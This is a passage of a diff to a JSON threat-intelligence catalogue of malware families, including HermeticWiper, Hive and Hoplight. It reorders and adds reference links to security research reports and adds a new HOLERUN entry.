"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
"https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html",
+ "https://www.youtube.com/watch?v=9nuo-AGg4p4",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
- "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
+ "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/"
],
"synonyms": [],
"type": []
@@ -26069,73 +27563,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper",
- "https://brandefense.io/hermeticwiper-technical-analysis-report/",
- "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
- "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
"https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
+ "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
"https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/",
- "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
- "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
- "https://twitter.com/fr0gger_/status/1497121876870832128",
+ "https://community.riskiq.com/article/9f59cb85",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
"https://t3n.de/news/cyber-attacken-ukraine-wiper-malware-1454318/",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html",
+ "https://thehackernews.com/2022/02/putin-warns-russian-critical.html",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://learnsentinel.blog/2022/02/28/detecting-malware-kill-chains-with-defender-and-microsoft-sentinel/",
+ "https://twitter.com/fr0gger_/status/1497121876870832128",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware",
+ "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
+ "https://twitter.com/threatintel/status/1496578746014437376",
+ "https://cloudsek.com/technical-analysis-of-the-hermetic-wiper-malware-used-to-target-ukraine/",
+ "https://dgc.org/en/hermeticwiper-malware/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
"https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/",
"https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/defenders-blog-on-cyberattacks-targeting-ukraine.html",
- "https://dgc.org/en/hermeticwiper-malware/",
- "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
- "https://unit42.paloaltonetworks.com/preparing-for-cyber-impact-russia-ukraine-crisis/",
+ "https://www.brighttalk.com/webcast/15591/534324",
"https://eln0ty.github.io/malware%20analysis/HermeticWiper/",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
- "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
- "https://www.englert.one/hermetic-wiper-reverse-code-engineering",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
- "https://blogs.blackberry.com/en/2022/03/threat-thursday-hermeticwiper",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
- "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
- "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
- "https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html",
- "https://www.secureworks.com/blog/disruptive-hermeticwiper-attacks-targeting-ukrainian-organizations",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf",
- "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
- "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
"https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
- "https://twitter.com/threatintel/status/1496578746014437376",
- "https://www.youtube.com/watch?v=sUlW45c9izU",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://community.riskiq.com/article/9f59cb85",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "https://www.deepinstinct.com/blog/hermeticwiper-malware-the-russian-ukrainian-cyber-war",
+ "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
+ "https://www.englert.one/hermetic-wiper-reverse-code-engineering",
"https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://elastic.github.io/security-research/intelligence/2022/03/01.hermeticwiper-targets-ukraine/article/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.zdnet.com/article/microsoft-finds-foxblade-malware-on-ukrainian-systems-removing-rt-from-windows-app-store/",
+ "https://brandefense.io/hermeticwiper-technical-analysis-report/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blogs.vmware.com/networkvirtualization/2022/03/hermetic-malware-multi-component-threat-targeting-ukraine-organizations.html/",
+ "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/",
+ "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
+ "https://www.youtube.com/watch?v=sUlW45c9izU",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://www.zscaler.com/blogs/security-research/hermeticwiper-resurgence-targeted-attacks-ukraine",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/digging-into-hermeticwiper.html",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://yoroi.company/research/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
+ "https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://securityintelligence.com/posts/new-destructive-malware-cyber-attacks-ukraine/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/hermeticwiper-a-detailed-analysis-of-the-destructive-malware-that-targeted-ukraine/"
],
"synonyms": [
"DriveSlayer",
@@ -26153,9 +27653,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
"https://twitter.com/silascutler/status/1501668345640366091",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
"https://twitter.com/ET_Labs/status/1502494650640351236",
"https://www.brighttalk.com/webcast/15591/534324"
],
@@ -26221,13 +27722,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee",
"https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/",
- "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/",
"https://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family",
+ "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/",
"https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/",
"https://www.freebuf.com/column/175106.html",
- "https://www.freebuf.com/column/174581.html",
"https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/",
- "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/"
+ "https://www.freebuf.com/column/174581.html"
],
"synonyms": [],
"type": []
@@ -26240,14 +27741,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear",
- "https://twitter.com/struppigel/status/950787783353884672",
- "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/",
- "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
- "https://github.com/goliate/hidden-tear",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://twitter.com/JAMESWT_MHT/status/1264828072001495041",
"https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html",
- "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring"
+ "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring",
+ "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/",
+ "https://twitter.com/JAMESWT_MHT/status/1264828072001495041",
+ "https://github.com/goliate/hidden-tear",
+ "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/",
+ "https://twitter.com/struppigel/status/950787783353884672",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
],
"synonyms": [
"FuckUnicorn"
@@ -26262,8 +27763,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [],
@@ -26277,10 +27778,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://twitter.com/MrDanPerez/status/1159461995013378048",
- "https://content.fireeye.com/apt-41/rpt-apt41/",
- "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html"
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
],
"synonyms": [],
"type": []
@@ -26321,25 +27823,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit",
- "https://www.recordedfuture.com/hidden-lynx-analysis/",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
"https://attack.mitre.org/groups/G0001/",
- "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf"
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://www.recordedfuture.com/hidden-lynx-analysis/",
+ "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "06953055-92ed-4936-8ffd-d9d72ab6bef6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1",
"value": "HiKit"
},
@@ -26387,42 +27880,47 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hive",
- "https://www.connectwise.com/resources/hive-profile",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
"https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
+ "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.connectwise.com/resources/hive-profile",
"https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://github.com/reecdeep/HiveV5_file_decryptor",
+ "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
+ "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
"https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/",
"https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://arxiv.org/pdf/2202.08477.pdf",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
+ "https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://github.com/rivitna/Malware/tree/main/Hive",
- "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
"https://www.ic3.gov/Media/News/2021/210825.pdf",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://blog.group-ib.com/hive",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
"https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
- "https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
- "https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/",
- "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
+ "https://blog.group-ib.com/hive",
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again"
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_hive_2021_v1.pdf",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://github.com/rivitna/Malware/tree/main/Hive",
+ "https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/"
],
"synonyms": [],
"type": []
@@ -26468,6 +27966,19 @@
"uuid": "379356c7-ec7a-4880-85d5-afe9608d6b60",
"value": "Holcus Installer (Adware)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun",
+ "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1860127d-41cf-4fe8-a58c-9f5304b91fb1",
+ "value": "HOLERUN"
+ },
{
"description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.",
"meta": {
@@ -26502,15 +28013,15 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight",
"https://www.us-cert.gov/ncas/analysis-reports/ar19-304a",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-100A",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045g",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea"
],
"synonyms": [
@@ -26580,10 +28091,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf",
"https://content.fireeye.com/apt/rpt-apt38",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
],
"synonyms": [],
"type": []
@@ -26596,31 +28107,32 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini",
- "https://cofense.com/houdini-worm-transformed-new-phishing-attack/",
- "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://www.youtube.com/watch?v=XDAiS6KBDOs",
- "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "http://blog.morphisec.com/hworm-houdini-aka-njrat",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/",
- "https://www.youtube.com/watch?v=h3KLKCdMUUY",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
"https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt",
- "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/",
